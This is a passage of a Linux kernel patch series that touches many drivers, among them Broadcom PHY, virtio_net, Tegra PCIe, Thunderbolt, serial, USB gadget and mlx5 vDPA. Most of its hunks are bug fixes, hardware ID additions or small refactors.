+ 	int err, reg;
+@@ -981,6 +992,8 @@ static struct phy_driver broadcom_drivers[] = {
+ 	.get_strings	= bcm_phy_get_strings,
+ 	.get_stats	= bcm54xx_get_stats,
+ 	.probe		= bcm54xx_phy_probe,
++	.read_mmd	= bcm54810_read_mmd,
++	.write_mmd	= bcm54810_write_mmd,
+ 	.config_init    = bcm54xx_config_init,
+ 	.config_aneg    = bcm5481_config_aneg,
+ 	.config_intr    = bcm_phy_config_intr,
+diff --git a/drivers/net/phy/phy_device.c b/drivers/net/phy/phy_device.c
+index 82f74f96eba29..944f76e6fc8eb 100644
+--- a/drivers/net/phy/phy_device.c
++++ b/drivers/net/phy/phy_device.c
+@@ -3050,6 +3050,8 @@ static int phy_probe(struct device *dev)
+ 			goto out;
+ 	}
+ 
++	phy_disable_interrupts(phydev);
++
+ 	/* Start out supporting everything. Eventually,
+ 	 * a controller will attach, and may modify one
+ 	 * or both of these values
+@@ -3137,16 +3139,6 @@ static int phy_remove(struct device *dev)
+ 	return 0;
+ }
+ 
+-static void phy_shutdown(struct device *dev)
+-{
+-	struct phy_device *phydev = to_phy_device(dev);
+-
+-	if (phydev->state == PHY_READY || !phydev->attached_dev)
+-		return;
+-
+-	phy_disable_interrupts(phydev);
+-}
+-
+ /**
+  * phy_driver_register - register a phy_driver with the PHY layer
+  * @new_driver: new phy_driver to register
+@@ -3180,7 +3172,6 @@ int phy_driver_register(struct phy_driver *new_driver, struct module *owner)
+ 	new_driver->mdiodrv.driver.bus = &mdio_bus_type;
+ 	new_driver->mdiodrv.driver.probe = phy_probe;
+ 	new_driver->mdiodrv.driver.remove = phy_remove;
+-	new_driver->mdiodrv.driver.shutdown = phy_shutdown;
+ 	new_driver->mdiodrv.driver.owner = owner;
+ 	new_driver->mdiodrv.driver.probe_type = PROBE_FORCE_SYNCHRONOUS;
+ 
+diff --git a/drivers/net/team/team.c b/drivers/net/team/team.c
+index 509ba706781ed..921ca59822b0f 100644
+--- a/drivers/net/team/team.c
++++ b/drivers/net/team/team.c
+@@ -2200,7 +2200,9 @@ static void team_setup(struct net_device *dev)
+ 
+ 	dev->hw_features = TEAM_VLAN_FEATURES |
+ 			   NETIF_F_HW_VLAN_CTAG_RX |
+-			   NETIF_F_HW_VLAN_CTAG_FILTER;
++			   NETIF_F_HW_VLAN_CTAG_FILTER |
++			   NETIF_F_HW_VLAN_STAG_RX |
++			   NETIF_F_HW_VLAN_STAG_FILTER;
+ 
+ 	dev->hw_features |= NETIF_F_GSO_ENCAP_ALL;
+ 	dev->features |= dev->hw_features;
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 075d5d42f5eb6..21d3461fb5d1c 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -2504,7 +2504,7 @@ static void virtnet_init_default_rss(struct virtnet_info *vi)
+ 		vi->ctrl->rss.indirection_table[i] = indir_val;
+ 	}
+ 
+-	vi->ctrl->rss.max_tx_vq = vi->curr_queue_pairs;
++	vi->ctrl->rss.max_tx_vq = vi->has_rss ? vi->curr_queue_pairs : 0;
+ 	vi->ctrl->rss.hash_key_length = vi->rss_key_size;
+ 
+ 	netdev_rss_key_fill(vi->ctrl->rss.key, vi->rss_key_size);
+@@ -3825,6 +3825,8 @@ static int virtnet_probe(struct virtio_device *vdev)
+ 		eth_hw_addr_set(dev, addr);
+ 	} else {
+ 		eth_hw_addr_random(dev);
++		dev_info(&vdev->dev, "Assigned random MAC address %pM\n",
++			 dev->dev_addr);
+ 	}
+ 
+ 	/* Set up our device-specific information */
+@@ -3940,8 +3942,6 @@ static int virtnet_probe(struct virtio_device *vdev)
+ 	if (vi->has_rss || vi->has_rss_hash_report)
+ 		virtnet_init_default_rss(vi);
+ 
+-	_virtnet_set_queues(vi, vi->curr_queue_pairs);
+-
+ 	/* serialize netdev register + virtio_device_ready() with ndo_open() */
+ 	rtnl_lock();
+ 
+@@ -3954,6 +3954,26 @@ static int virtnet_probe(struct virtio_device *vdev)
+ 
+ 	virtio_device_ready(vdev);
+ 
++	_virtnet_set_queues(vi, vi->curr_queue_pairs);
++
++	/* a random MAC address has been assigned, notify the device.
++	 * We don't fail probe if VIRTIO_NET_F_CTRL_MAC_ADDR is not there
++	 * because many devices work fine without getting MAC explicitly
++	 */
++	if (!virtio_has_feature(vdev, VIRTIO_NET_F_MAC) &&
++	    virtio_has_feature(vi->vdev, VIRTIO_NET_F_CTRL_MAC_ADDR)) {
++		struct scatterlist sg;
++
++		sg_init_one(&sg, dev->dev_addr, dev->addr_len);
++		if (!virtnet_send_command(vi, VIRTIO_NET_CTRL_MAC,
++					  VIRTIO_NET_CTRL_MAC_ADDR_SET, &sg)) {
++			pr_debug("virtio_net: setting MAC address failed\n");
++			rtnl_unlock();
++			err = -EINVAL;
++			goto free_unregister_netdev;
++		}
++	}
++
+ 	rtnl_unlock();
+ 
+ 	err = virtnet_cpu_notif_add(vi);
+diff --git a/drivers/pci/controller/dwc/pcie-tegra194.c b/drivers/pci/controller/dwc/pcie-tegra194.c
+index 1b6b437823d22..528e73ccfa43e 100644
+--- a/drivers/pci/controller/dwc/pcie-tegra194.c
++++ b/drivers/pci/controller/dwc/pcie-tegra194.c
+@@ -224,6 +224,7 @@
+ #define EP_STATE_ENABLED	1
+ 
+ static const unsigned int pcie_gen_freq[] = {
++	GEN1_CORE_CLK_FREQ,	/* PCI_EXP_LNKSTA_CLS == 0; undefined */
+ 	GEN1_CORE_CLK_FREQ,
+ 	GEN2_CORE_CLK_FREQ,
+ 	GEN3_CORE_CLK_FREQ,
+@@ -455,7 +456,11 @@ static irqreturn_t tegra_pcie_ep_irq_thread(int irq, void *arg)
+ 
+ 	speed = dw_pcie_readw_dbi(pci, pcie->pcie_cap_base + PCI_EXP_LNKSTA) &
+ 		PCI_EXP_LNKSTA_CLS;
+-	clk_set_rate(pcie->core_clk, pcie_gen_freq[speed - 1]);
++
++	if (speed >= ARRAY_SIZE(pcie_gen_freq))
++		speed = 0;
++
++	clk_set_rate(pcie->core_clk, pcie_gen_freq[speed]);
+ 
+ 	if (pcie->of_data->has_ltr_req_fix)
+ 		return IRQ_HANDLED;
+@@ -1016,7 +1021,11 @@ retry_link:
+ 
+ 	speed = dw_pcie_readw_dbi(pci, pcie->pcie_cap_base + PCI_EXP_LNKSTA) &
+ 		PCI_EXP_LNKSTA_CLS;
+-	clk_set_rate(pcie->core_clk, pcie_gen_freq[speed - 1]);
++
++	if (speed >= ARRAY_SIZE(pcie_gen_freq))
++		speed = 0;
++
++	clk_set_rate(pcie->core_clk, pcie_gen_freq[speed]);
+ 
+ 	tegra_pcie_enable_interrupts(pp);
+ 
+diff --git a/drivers/pcmcia/rsrc_nonstatic.c b/drivers/pcmcia/rsrc_nonstatic.c
+index ad1141fddb4cc..8bda75990bce5 100644
+--- a/drivers/pcmcia/rsrc_nonstatic.c
++++ b/drivers/pcmcia/rsrc_nonstatic.c
+@@ -1053,6 +1053,8 @@ static void nonstatic_release_resource_db(struct pcmcia_socket *s)
+ 		q = p->next;
+ 		kfree(p);
+ 	}
++
++	kfree(data);
+ }
+ 
+ 
+diff --git a/drivers/soc/aspeed/aspeed-socinfo.c b/drivers/soc/aspeed/aspeed-socinfo.c
+index 1ca140356a084..3f759121dc00a 100644
+--- a/drivers/soc/aspeed/aspeed-socinfo.c
++++ b/drivers/soc/aspeed/aspeed-socinfo.c
+@@ -137,6 +137,7 @@ static int __init aspeed_socinfo_init(void)
+ 
+ 	soc_dev = soc_device_register(attrs);
+ 	if (IS_ERR(soc_dev)) {
++		kfree(attrs->machine);
+ 		kfree(attrs->soc_id);
+ 		kfree(attrs->serial_number);
+ 		kfree(attrs);
+diff --git a/drivers/soc/aspeed/aspeed-uart-routing.c b/drivers/soc/aspeed/aspeed-uart-routing.c
+index ef8b24fd18518..59123e1f27acb 100644
+--- a/drivers/soc/aspeed/aspeed-uart-routing.c
++++ b/drivers/soc/aspeed/aspeed-uart-routing.c
+@@ -524,7 +524,7 @@ static ssize_t aspeed_uart_routing_store(struct device *dev,
+ 	struct aspeed_uart_routing_selector *sel = to_routing_selector(attr);
+ 	int val;
+ 
+-	val = match_string(sel->options, -1, buf);
++	val = __sysfs_match_string(sel->options, -1, buf);
+ 	if (val < 0) {
+ 		dev_err(dev, "invalid value \"%s\"\n", buf);
+ 		return -EINVAL;
+diff --git a/drivers/thunderbolt/nhi.c b/drivers/thunderbolt/nhi.c
+index 4a6a3802d7e51..288aaa05d0071 100644
+--- a/drivers/thunderbolt/nhi.c
++++ b/drivers/thunderbolt/nhi.c
+@@ -1479,6 +1479,8 @@ static struct pci_device_id nhi_ids[] = {
+ 	  .driver_data = (kernel_ulong_t)&icl_nhi_ops },
+ 	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTL_P_NHI1),
+ 	  .driver_data = (kernel_ulong_t)&icl_nhi_ops },
++	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HOST_80G_NHI) },
++	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HOST_40G_NHI) },
+ 
+ 	/* Any USB4 compliant host */
+ 	{ PCI_DEVICE_CLASS(PCI_CLASS_SERIAL_USB_USB4, ~0) },
+diff --git a/drivers/thunderbolt/nhi.h b/drivers/thunderbolt/nhi.h
+index b0718020c6f59..0f029ce758825 100644
+--- a/drivers/thunderbolt/nhi.h
++++ b/drivers/thunderbolt/nhi.h
+@@ -75,6 +75,10 @@ extern const struct tb_nhi_ops icl_nhi_ops;
+ #define PCI_DEVICE_ID_INTEL_TITAN_RIDGE_DD_BRIDGE	0x15ef
+ #define PCI_DEVICE_ID_INTEL_ADL_NHI0			0x463e
+ #define PCI_DEVICE_ID_INTEL_ADL_NHI1			0x466d
++#define PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HOST_80G_NHI	0x5781
++#define PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HOST_40G_NHI	0x5784
++#define PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HUB_80G_BRIDGE 0x5786
++#define PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HUB_40G_BRIDGE 0x57a4
+ #define PCI_DEVICE_ID_INTEL_MTL_M_NHI0			0x7eb2
+ #define PCI_DEVICE_ID_INTEL_MTL_P_NHI0			0x7ec2
+ #define PCI_DEVICE_ID_INTEL_MTL_P_NHI1			0x7ec3
+diff --git a/drivers/thunderbolt/quirks.c b/drivers/thunderbolt/quirks.c
+index 1157b8869bcca..8c2ee431fcde8 100644
+--- a/drivers/thunderbolt/quirks.c
++++ b/drivers/thunderbolt/quirks.c
+@@ -74,6 +74,14 @@ static const struct tb_quirk tb_quirks[] = {
+ 		  quirk_usb3_maximum_bandwidth },
+ 	{ 0x8087, PCI_DEVICE_ID_INTEL_MTL_P_NHI1, 0x0000, 0x0000,
+ 		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HOST_80G_NHI, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HOST_40G_NHI, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HUB_80G_BRIDGE, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HUB_40G_BRIDGE, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
+ 	/*
+ 	 * CLx is not supported on AMD USB4 Yellow Carp and Pink Sardine platforms.
+ 	 */
+diff --git a/drivers/thunderbolt/retimer.c b/drivers/thunderbolt/retimer.c
+index 9cc28197dbc45..edbd92435b41a 100644
+--- a/drivers/thunderbolt/retimer.c
++++ b/drivers/thunderbolt/retimer.c
+@@ -187,6 +187,21 @@ static ssize_t nvm_authenticate_show(struct device *dev,
+ 	return ret;
+ }
+ 
++static void tb_retimer_nvm_authenticate_status(struct tb_port *port, u32 *status)
++{
++	int i;
++
++	tb_port_dbg(port, "reading NVM authentication status of retimers\n");
++
++	/*
++	 * Before doing anything else, read the authentication status.
++	 * If the retimer has it set, store it for the new retimer
++	 * device instance.
++	 */
++	for (i = 1; i <= TB_MAX_RETIMER_INDEX; i++)
++		usb4_port_retimer_nvm_authenticate_status(port, i, &status[i]);
++}
++
+ static void tb_retimer_set_inbound_sbtx(struct tb_port *port)
+ {
+ 	int i;
+@@ -455,18 +470,16 @@ int tb_retimer_scan(struct tb_port *port, bool add)
+ 		return ret;
+ 
+ 	/*
+-	 * Enable sideband channel for each retimer. We can do this
+-	 * regardless whether there is device connected or not.
++	 * Immediately after sending enumerate retimers read the
++	 * authentication status of each retimer.
+ 	 */
+-	tb_retimer_set_inbound_sbtx(port);
++	tb_retimer_nvm_authenticate_status(port, status);
+ 
+ 	/*
+-	 * Before doing anything else, read the authentication status.
+-	 * If the retimer has it set, store it for the new retimer
+-	 * device instance.
++	 * Enable sideband channel for each retimer. We can do this
++	 * regardless whether there is device connected or not.
+ 	 */
+-	for (i = 1; i <= TB_MAX_RETIMER_INDEX; i++)
+-		usb4_port_retimer_nvm_authenticate_status(port, i, &status[i]);
++	tb_retimer_set_inbound_sbtx(port);
+ 
+ 	for (i = 1; i <= TB_MAX_RETIMER_INDEX; i++) {
+ 		/*
+diff --git a/drivers/tty/n_gsm.c b/drivers/tty/n_gsm.c
+index 59a559366b614..c1fa20a4e3420 100644
+--- a/drivers/tty/n_gsm.c
++++ b/drivers/tty/n_gsm.c
+@@ -2481,12 +2481,13 @@ static void gsm_error(struct gsm_mux *gsm)
+ static void gsm_cleanup_mux(struct gsm_mux *gsm, bool disc)
+ {
+ 	int i;
+-	struct gsm_dlci *dlci = gsm->dlci[0];
++	struct gsm_dlci *dlci;
+ 	struct gsm_msg *txq, *ntxq;
+ 
+ 	gsm->dead = true;
+ 	mutex_lock(&gsm->mutex);
+ 
++	dlci = gsm->dlci[0];
+ 	if (dlci) {
+ 		if (disc && dlci->state != DLCI_CLOSED) {
+ 			gsm_dlci_begin_close(dlci);
+diff --git a/drivers/tty/serial/8250/8250_port.c b/drivers/tty/serial/8250/8250_port.c
+index acf578aa9930b..38760bd6e0c29 100644
+--- a/drivers/tty/serial/8250/8250_port.c
++++ b/drivers/tty/serial/8250/8250_port.c
+@@ -3281,6 +3281,7 @@ void serial8250_init_port(struct uart_8250_port *up)
+ 	struct uart_port *port = &up->port;
+ 
+ 	spin_lock_init(&port->lock);
++	port->pm = NULL;
+ 	port->ops = &serial8250_pops;
+ 	port->has_sysrq = IS_ENABLED(CONFIG_SERIAL_8250_CONSOLE);
+ 
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index f6d0ea2c6be4b..c5a9b89c4d313 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -1125,8 +1125,8 @@ static void lpuart_copy_rx_to_tty(struct lpuart_port *sport)
+ 		unsigned long sr = lpuart32_read(&sport->port, UARTSTAT);
+ 
+ 		if (sr & (UARTSTAT_PE | UARTSTAT_FE)) {
+-			/* Read DR to clear the error flags */
+-			lpuart32_read(&sport->port, UARTDATA);
++			/* Clear the error flags */
++			lpuart32_write(&sport->port, sr, UARTSTAT);
+ 
+ 			if (sr & UARTSTAT_PE)
+ 				sport->port.icount.parity++;
+diff --git a/drivers/tty/serial/stm32-usart.c b/drivers/tty/serial/stm32-usart.c
+index 28edbaf7bb329..2a9c4058824a8 100644
+--- a/drivers/tty/serial/stm32-usart.c
++++ b/drivers/tty/serial/stm32-usart.c
+@@ -1753,13 +1753,10 @@ static int stm32_usart_serial_remove(struct platform_device *pdev)
+ 	struct uart_port *port = platform_get_drvdata(pdev);
+ 	struct stm32_port *stm32_port = to_stm32_port(port);
+ 	const struct stm32_usart_offsets *ofs = &stm32_port->info->ofs;
+-	int err;
+ 	u32 cr3;
+ 
+ 	pm_runtime_get_sync(&pdev->dev);
+-	err = uart_remove_one_port(&stm32_usart_driver, port);
+-	if (err)
+-		return(err);
++	uart_remove_one_port(&stm32_usart_driver, port);
+ 
+ 	pm_runtime_disable(&pdev->dev);
+ 	pm_runtime_set_suspended(&pdev->dev);
+diff --git a/drivers/usb/chipidea/ci_hdrc_imx.c b/drivers/usb/chipidea/ci_hdrc_imx.c
+index 9ffcecd3058c1..60b4de0a4f76d 100644
+--- a/drivers/usb/chipidea/ci_hdrc_imx.c
++++ b/drivers/usb/chipidea/ci_hdrc_imx.c
+@@ -70,6 +70,10 @@ static const struct ci_hdrc_imx_platform_flag imx7ulp_usb_data = {
+ 		CI_HDRC_PMQOS,
+ };
+ 
++static const struct ci_hdrc_imx_platform_flag imx8ulp_usb_data = {
++	.flags = CI_HDRC_SUPPORTS_RUNTIME_PM,
++};
++
+ static const struct of_device_id ci_hdrc_imx_dt_ids[] = {
+ 	{ .compatible = "fsl,imx23-usb", .data = &imx23_usb_data},
+ 	{ .compatible = "fsl,imx28-usb", .data = &imx28_usb_data},
+@@ -80,6 +84,7 @@ static const struct of_device_id ci_hdrc_imx_dt_ids[] = {
+ 	{ .compatible = "fsl,imx6ul-usb", .data = &imx6ul_usb_data},
+ 	{ .compatible = "fsl,imx7d-usb", .data = &imx7d_usb_data},
+ 	{ .compatible = "fsl,imx7ulp-usb", .data = &imx7ulp_usb_data},
++	{ .compatible = "fsl,imx8ulp-usb", .data = &imx8ulp_usb_data},
+ 	{ /* sentinel */ }
+ };
+ MODULE_DEVICE_TABLE(of, ci_hdrc_imx_dt_ids);
+diff --git a/drivers/usb/chipidea/usbmisc_imx.c b/drivers/usb/chipidea/usbmisc_imx.c
+index bac0f5458cab9..2318c7906acdb 100644
+--- a/drivers/usb/chipidea/usbmisc_imx.c
++++ b/drivers/usb/chipidea/usbmisc_imx.c
+@@ -135,7 +135,7 @@
+ #define TXVREFTUNE0_MASK		(0xf << 20)
+ 
+ #define MX6_USB_OTG_WAKEUP_BITS (MX6_BM_WAKEUP_ENABLE | MX6_BM_VBUS_WAKEUP | \
+-				 MX6_BM_ID_WAKEUP)
++				 MX6_BM_ID_WAKEUP | MX6SX_BM_DPDM_WAKEUP_EN)
+ 
+ struct usbmisc_ops {
+ 	/* It's called once when probe a usb device */
+diff --git a/drivers/usb/gadget/function/u_serial.c b/drivers/usb/gadget/function/u_serial.c
+index ea2c5b6cde8cd..3c51355ccc94d 100644
+--- a/drivers/usb/gadget/function/u_serial.c
++++ b/drivers/usb/gadget/function/u_serial.c
+@@ -915,8 +915,11 @@ static void __gs_console_push(struct gs_console *cons)
+ 	}
+ 
+ 	req->length = size;
++
++	spin_unlock_irq(&cons->lock);
+ 	if (usb_ep_queue(ep, req, GFP_ATOMIC))
+ 		req->length = 0;
++	spin_lock_irq(&cons->lock);
+ }
+ 
+ static void gs_console_work(struct work_struct *work)
+diff --git a/drivers/usb/gadget/function/uvc_video.c b/drivers/usb/gadget/function/uvc_video.c
+index dd1c6b2ca7c6f..e81865978299c 100644
+--- a/drivers/usb/gadget/function/uvc_video.c
++++ b/drivers/usb/gadget/function/uvc_video.c
+@@ -386,6 +386,9 @@ static void uvcg_video_pump(struct work_struct *work)
+ 	struct uvc_buffer *buf;
+ 	unsigned long flags;
+ 	int ret;
++	bool buf_int;
++	/* video->max_payload_size is only set when using bulk transfer */
++	bool is_bulk = video->max_payload_size;
+ 
+ 	while (video->ep->enabled) {
+ 		/*
+@@ -408,20 +411,35 @@ static void uvcg_video_pump(struct work_struct *work)
+ 		 */
+ 		spin_lock_irqsave(&queue->irqlock, flags);
+ 		buf = uvcg_queue_head(queue);
+-		if (buf == NULL) {
++
++		if (buf != NULL) {
++			video->encode(req, video, buf);
++			/* Always interrupt for the last request of a video buffer */
++			buf_int = buf->state == UVC_BUF_STATE_DONE;
++		} else if (!(queue->flags & UVC_QUEUE_DISCONNECTED) && !is_bulk) {
++			/*
++			 * No video buffer available; the queue is still connected and
++			 * we're traferring over ISOC. Queue a 0 length request to
++			 * prevent missed ISOC transfers.
++			 */
++			req->length = 0;
++			buf_int = false;
++		} else {
++			/*
++			 * Either queue has been disconnected or no video buffer
++			 * available to bulk transfer. Either way, stop processing
++			 * further.
++			 */
+ 			spin_unlock_irqrestore(&queue->irqlock, flags);
+ 			break;
+ 		}
+ 
+-		video->encode(req, video, buf);
+-
+ 		/*
+ 		 * With usb3 we have more requests. This will decrease the
+ 		 * interrupt load to a quarter but also catches the corner
+ 		 * cases, which needs to be handled.
+ 		 */
+-		if (list_empty(&video->req_free) ||
+-		    buf->state == UVC_BUF_STATE_DONE ||
++		if (list_empty(&video->req_free) || buf_int ||
+ 		    !(video->req_int_count %
+ 		       DIV_ROUND_UP(video->uvc_num_requests, 4))) {
+ 			video->req_int_count = 0;
+@@ -441,8 +459,7 @@ static void uvcg_video_pump(struct work_struct *work)
+ 
+ 		/* Endpoint now owns the request */
+ 		req = NULL;
+-		if (buf->state != UVC_BUF_STATE_DONE)
+-			video->req_int_count++;
++		video->req_int_count++;
+ 	}
+ 
+ 	if (!req)
+@@ -527,4 +544,3 @@ int uvcg_video_init(struct uvc_video *video, struct uvc_device *uvc)
+ 			V4L2_BUF_TYPE_VIDEO_OUTPUT, &video->mutex);
+ 	return 0;
+ }
+-
+diff --git a/drivers/vdpa/mlx5/core/mlx5_vdpa.h b/drivers/vdpa/mlx5/core/mlx5_vdpa.h
+index 25fc4120b618d..b53420e874acb 100644
+--- a/drivers/vdpa/mlx5/core/mlx5_vdpa.h
++++ b/drivers/vdpa/mlx5/core/mlx5_vdpa.h
+@@ -31,6 +31,7 @@ struct mlx5_vdpa_mr {
+ 	struct list_head head;
+ 	unsigned long num_directs;
+ 	unsigned long num_klms;
++	/* state of dvq mr */
+ 	bool initialized;
+ 
+ 	/* serialize mkey creation and destruction */
+@@ -121,6 +122,7 @@ int mlx5_vdpa_handle_set_map(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *io
+ int mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb,
+ 			unsigned int asid);
+ void mlx5_vdpa_destroy_mr(struct mlx5_vdpa_dev *mvdev);
++void mlx5_vdpa_destroy_mr_asid(struct mlx5_vdpa_dev *mvdev, unsigned int asid);
+ 
+ #define mlx5_vdpa_warn(__dev, format, ...)                                                         \
+ 	dev_warn((__dev)->mdev->device, "%s:%d:(pid %d) warning: " format, __func__, __LINE__,     \
+diff --git a/drivers/vdpa/mlx5/core/mr.c b/drivers/vdpa/mlx5/core/mr.c
+index a4d7ee2339fa5..113aac0446de5 100644
+--- a/drivers/vdpa/mlx5/core/mr.c
++++ b/drivers/vdpa/mlx5/core/mr.c
+@@ -491,15 +491,24 @@ static void destroy_user_mr(struct mlx5_vdpa_dev *mvdev, struct mlx5_vdpa_mr *mr
+ 	}
+ }
+ 
+-void mlx5_vdpa_destroy_mr(struct mlx5_vdpa_dev *mvdev)
++static void _mlx5_vdpa_destroy_cvq_mr(struct mlx5_vdpa_dev *mvdev, unsigned int asid)
++{
++	if (mvdev->group2asid[MLX5_VDPA_CVQ_GROUP] != asid)
++		return;
++
++	prune_iotlb(mvdev);
++}
++
++static void _mlx5_vdpa_destroy_dvq_mr(struct mlx5_vdpa_dev *mvdev, unsigned int asid)
+ {
+ 	struct mlx5_vdpa_mr *mr = &mvdev->mr;
+ 
+-	mutex_lock(&mr->mkey_mtx);
++	if (mvdev->group2asid[MLX5_VDPA_DATAVQ_GROUP] != asid)
++		return;
++
+ 	if (!mr->initialized)
+-		goto out;
++		return;
+ 
+-	prune_iotlb(mvdev);
+ 	if (mr->user_mr)
+ 		destroy_user_mr(mvdev, mr);
+ 	else
+@@ -507,45 +516,79 @@ void mlx5_vdpa_destroy_mr(struct mlx5_vdpa_dev *mvdev)
+ 
+ 	memset(mr, 0, sizeof(*mr));
+ 	mr->initialized = false;
+-out:
++}
++
++void mlx5_vdpa_destroy_mr_asid(struct mlx5_vdpa_dev *mvdev, unsigned int asid)
++{
++	struct mlx5_vdpa_mr *mr = &mvdev->mr;
++
++	mutex_lock(&mr->mkey_mtx);
++
++	_mlx5_vdpa_destroy_dvq_mr(mvdev, asid);
++	_mlx5_vdpa_destroy_cvq_mr(mvdev, asid);
++
+ 	mutex_unlock(&mr->mkey_mtx);
+ }
+ 
+-static int _mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev,
+-				struct vhost_iotlb *iotlb, unsigned int asid)
++void mlx5_vdpa_destroy_mr(struct mlx5_vdpa_dev *mvdev)
++{
++	mlx5_vdpa_destroy_mr_asid(mvdev, mvdev->group2asid[MLX5_VDPA_CVQ_GROUP]);
++	mlx5_vdpa_destroy_mr_asid(mvdev, mvdev->group2asid[MLX5_VDPA_DATAVQ_GROUP]);
++}
++
++static int _mlx5_vdpa_create_cvq_mr(struct mlx5_vdpa_dev *mvdev,
++				    struct vhost_iotlb *iotlb,
++				    unsigned int asid)
++{
++	if (mvdev->group2asid[MLX5_VDPA_CVQ_GROUP] != asid)
++		return 0;
++
++	return dup_iotlb(mvdev, iotlb);
++}
++
++static int _mlx5_vdpa_create_dvq_mr(struct mlx5_vdpa_dev *mvdev,
++				    struct vhost_iotlb *iotlb,
++				    unsigned int asid)
+ {
+ 	struct mlx5_vdpa_mr *mr = &mvdev->mr;
+ 	int err;
+ 
+-	if (mr->initialized)
++	if (mvdev->group2asid[MLX5_VDPA_DATAVQ_GROUP] != asid)
+ 		return 0;
+ 
+-	if (mvdev->group2asid[MLX5_VDPA_DATAVQ_GROUP] == asid) {
+-		if (iotlb)
+-			err = create_user_mr(mvdev, iotlb);
+-		else
+-			err = create_dma_mr(mvdev, mr);
++	if (mr->initialized)
++		return 0;
+ 
+-		if (err)
+-			return err;
+-	}
++	if (iotlb)
++		err = create_user_mr(mvdev, iotlb);
++	else
++		err = create_dma_mr(mvdev, mr);
+ 
+-	if (mvdev->group2asid[MLX5_VDPA_CVQ_GROUP] == asid) {
+-		err = dup_iotlb(mvdev, iotlb);
+-		if (err)
+-			goto out_err;
+-	}
++	if (err)
++		return err;
+ 
+ 	mr->initialized = true;
++
++	return 0;
++}
++
++static int _mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev,
++				struct vhost_iotlb *iotlb, unsigned int asid)
++{
++	int err;
++
++	err = _mlx5_vdpa_create_dvq_mr(mvdev, iotlb, asid);
++	if (err)
++		return err;
++
++	err = _mlx5_vdpa_create_cvq_mr(mvdev, iotlb, asid);
++	if (err)
++		goto out_err;
++
+ 	return 0;
+ 
+ out_err:
+-	if (mvdev->group2asid[MLX5_VDPA_DATAVQ_GROUP] == asid) {
+-		if (iotlb)
+-			destroy_user_mr(mvdev, mr);
+-		else
+-			destroy_dma_mr(mvdev, mr);
+-	}
++	_mlx5_vdpa_destroy_dvq_mr(mvdev, asid);
+ 
+ 	return err;
+ }
+diff --git a/drivers/vdpa/mlx5/net/mlx5_vnet.c b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+index daac3ab314785..bf99654371b35 100644
+--- a/drivers/vdpa/mlx5/net/mlx5_vnet.c
++++ b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+@@ -2406,7 +2406,7 @@ static int mlx5_vdpa_change_map(struct mlx5_vdpa_dev *mvdev,
+ 		goto err_mr;
+ 
+ 	teardown_driver(ndev);
+-	mlx5_vdpa_destroy_mr(mvdev);
++	mlx5_vdpa_destroy_mr_asid(mvdev, asid);
+ 	err = mlx5_vdpa_create_mr(mvdev, iotlb, asid);
+ 	if (err)
+ 		goto err_mr;
+@@ -2422,7 +2422,7 @@ static int mlx5_vdpa_change_map(struct mlx5_vdpa_dev *mvdev,
+ 	return 0;
+ 
+ err_setup:
+-	mlx5_vdpa_destroy_mr(mvdev);
++	mlx5_vdpa_destroy_mr_asid(mvdev, asid);
+ err_mr:
+ 	return err;
+ }
+diff --git a/drivers/vdpa/vdpa.c b/drivers/vdpa/vdpa.c
+index febdc99b51a7b..908b3f98ecbee 100644
+--- a/drivers/vdpa/vdpa.c
++++ b/drivers/vdpa/vdpa.c
+@@ -1172,44 +1172,41 @@ static const struct nla_policy vdpa_nl_policy[VDPA_ATTR_MAX + 1] = {
+ 	[VDPA_ATTR_MGMTDEV_DEV_NAME] = { .type = NLA_STRING },
+ 	[VDPA_ATTR_DEV_NAME] = { .type = NLA_STRING },
+ 	[VDPA_ATTR_DEV_NET_CFG_MACADDR] = NLA_POLICY_ETH_ADDR,
++	[VDPA_ATTR_DEV_NET_CFG_MAX_VQP] = { .type = NLA_U16 },
+ 	/* virtio spec 1.1 section 5.1.4.1 for valid MTU range */
+ 	[VDPA_ATTR_DEV_NET_CFG_MTU] = NLA_POLICY_MIN(NLA_U16, 68),
++	[VDPA_ATTR_DEV_QUEUE_INDEX] = { .type = NLA_U32 },
++	[VDPA_ATTR_DEV_FEATURES] = { .type = NLA_U64 },
+ };
+ 
+ static const struct genl_ops vdpa_nl_ops[] = {
+ 	{
+ 		.cmd = VDPA_CMD_MGMTDEV_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+ 		.doit = vdpa_nl_cmd_mgmtdev_get_doit,
+ 		.dumpit = vdpa_nl_cmd_mgmtdev_get_dumpit,
+ 	},
+ 	{
+ 		.cmd = VDPA_CMD_DEV_NEW,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+ 		.doit = vdpa_nl_cmd_dev_add_set_doit,
